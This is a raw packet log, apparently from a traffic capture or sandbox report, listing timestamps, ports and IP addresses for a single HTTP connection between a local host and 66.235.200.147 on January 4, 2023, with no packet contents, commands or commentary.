Jan 4, 2023 16:47:38.403155088 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403192997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403204918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403233051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403251886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403295040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403299093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403333902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403347015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403372049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403393984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403418064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403440952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403465033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403511047 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403641939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403688908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403717995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403736115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403779984 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403798103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403820038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403857946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403865099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403929949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.403932095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.403980017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404016972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.404026985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404072046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404119015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404164076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404179096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.404239893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404243946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.404287100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404309034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.404334068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404371023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.404381990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404409885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.404448986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.404617071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404664993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404690027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.404711962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404753923 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.404758930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404788971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.404807091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404828072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.404854059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404875994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.404901028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404916048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.404947996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.404957056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.404994965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405030966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405041933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405090094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405090094 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405132055 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405137062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405172110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405184031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405208111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405234098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405251980 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405281067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405289888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405363083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405510902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405558109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405581951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405637980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405642986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405685902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405721903 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405733109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405780077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405782938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405826092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405838966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405873060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405879021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405916929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405920029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405958891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.405968904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.405993938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406016111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406035900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406063080 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406076908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406110048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406157017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406161070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406223059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406234026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406307936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406478882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406510115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406539917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406552076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406573057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406593084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406605005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406632900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406636000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406675100 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406688929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406708956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406728983 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406744957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406764984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406796932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406797886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406817913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406847954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406872034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406881094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406913042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406917095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406943083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.406950951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.406984091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.407002926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.407411098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407443047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407473087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407501936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407504082 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.407532930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.407533884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407576084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.407613993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.407685995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407716990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407746077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.407747030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407778025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407789946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.407809019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407819033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.407840014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.407840967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407871962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.407872915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407897949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.407905102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407918930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.407936096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407967091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.407975912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.407998085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408008099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408029079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408036947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408058882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408072948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408104897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408108950 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408135891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408147097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408180952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408198118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408648968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408679962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408710957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408725977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408742905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408763885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408775091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408806086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408807993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408838034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408845901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408869028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408870935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408900023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408900976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408920050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408932924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408950090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.408965111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408994913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.408998013 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.409025908 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.409035921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.409056902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.409068108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.409085989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.409090996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.409125090 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.409142017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.409706116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.409753084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.409792900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.409795046 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.409836054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.409837008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.409852982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.409872055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.409904003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.409941912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556292057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556335926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556363106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556390047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556416035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556442976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556471109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556476116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556476116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556477070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556495905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556570053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556570053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556570053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556632996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556663036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556693077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556701899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556721926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556732893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556744099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556771994 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556797981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556813955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556824923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556843042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556854010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556869030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556884050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556901932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556911945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.556938887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556938887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556967974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.556941032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557202101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557228088 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557238102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.557256937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557270050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.557286978 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557297945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.557315111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557323933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.557342052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557349920 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.557370901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557374001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.557398081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.557399988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557426929 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.557462931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.557686090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557723999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557760954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557760954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.557800055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557818890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.557837009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557857990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.557874918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.557912111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.557935953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.558087111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.558156967 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.558159113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.558190107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.558219910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.558247089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.558248043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.558278084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.558278084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.558305979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.558305025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.558336020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.558336973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.558336973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.558367968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.558374882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.558403969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.558448076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560141087 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560241938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560360909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560441971 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560480118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560527086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560550928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560570002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560587883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560604095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560637951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560650110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560678005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560683966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560715914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560734987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560745955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560770988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560771942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560775042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560817957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560832977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560844898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560857058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560861111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.560890913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560890913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560926914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560950041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.560966969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561001062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561042070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561043024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561072111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561093092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561120033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561141014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561166048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561177969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561213970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561228991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561254025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561264992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561290979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561291933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561331034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561341047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561361074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561377048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561408997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561413050 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.561439991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.561440945 CET	49696	80	192.168.2.4	66.235.200.147
